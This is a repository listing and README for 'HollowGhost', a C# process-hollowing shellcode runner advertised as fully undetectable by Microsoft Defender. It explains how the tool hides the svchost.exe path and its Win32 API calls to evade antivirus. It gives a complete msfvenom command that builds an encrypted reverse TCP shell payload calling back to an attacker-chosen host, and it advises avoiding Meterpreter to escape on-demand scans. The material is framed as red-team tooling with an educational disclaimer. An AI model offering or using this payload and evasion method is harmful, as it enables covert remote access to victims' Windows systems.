https://github.com/logan-elliott/hollowghost
Process hollowing C# shellcode runner that is FUD against Microsoft Defender as of October 7, 2023.
https://github.com/logan-elliott/hollowghost
antivirus-evasion defender fud injection penetration-testing process-hollowing red-team runner shellcode
Last synced: 6 months ago
JSON representation
Process hollowing C# shellcode runner that is FUD against Microsoft Defender as of October 7, 2023.
- Host: GitHub
- URL: https://github.com/logan-elliott/hollowghost
- Owner: Logan-Elliott
- Created: 2023-10-08T00:16:44.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2023-10-08T05:53:59.000Z (over 1 year ago)
- Last Synced: 2024-10-16T07:41:40.611Z (8 months ago)
- Topics: antivirus-evasion, defender, fud, injection, penetration-testing, process-hollowing, red-team, runner, shellcode
- Language: C#
- Homepage:
- Size: 479 KB
- Stars: 15
- Watchers: 3
- Forks: 3
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# HollowGhost :ghost:
Process hollowing C# shellcode runner that is FUD against Microsoft Defender as of October 7, 2023.HollowGhost performs process hollowing injection into **svchost.exe** on Windows.
This shellcode runner is currently FUD by Microsoft Defender at scan-time, runtime, and during on-demand scanning with an active shell.
**Disclaimer**: The resources provided are only for educational and research purposes. I am, in no way, responsible for any misuse of these resources. The resources shown here should only be used legally for ethical hacking.
There are currently two versions of this shellcode runner.
The only difference between the two:
- **HollowGhost** utilizes string concatenation to obfuscate the file path string "C:\Windows\System32\svchost.exe" passed to the CreateProcess Win32 API function.
- **HollowGhostEncPath** utilizes AES encryption with a dynamically generated IV and key to obfuscate the file path string "C:\Windows\System32\svchost.exe" passed to the CreateProcess Win32 API function.
Both versions of the shellcode runner use custom delegate functions to obfuscate the Win32 API function calls and evade antivirus.
**Payload**:
`msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.X.X LPORT=443 EXITFUNC=thread -f csharp --encrypt xor --encrypt-key z -i 20 | tr -d '\n\r'`
**Note**: Using a Meterpreter payload will result in detection if an on-demand scan is performed while the shell session is active. Therefore, stick to payloads that don't use Meterpreter.
## Instructions
To keep things contained to one repository, both projects are within the HollowGhost.sln solution.
- Clone the repository `git clone https://github.com/Logan-Elliott/HollowGhost.git`
- Open the HollowGhost.sln solution file with Visual Studio
- Set build configuration to Release
- Set platform to x64
- Good to go :thumbsup:## Windows 11 Build Tested
## HollowGhost: FUD During On-Demand Scanning With Shell
## HollowGhostEncPath: FUD During On-Demand Scanning With Shell
## To-Do List
- [ ] Edit code to output PID of the created svchost.exe process to the console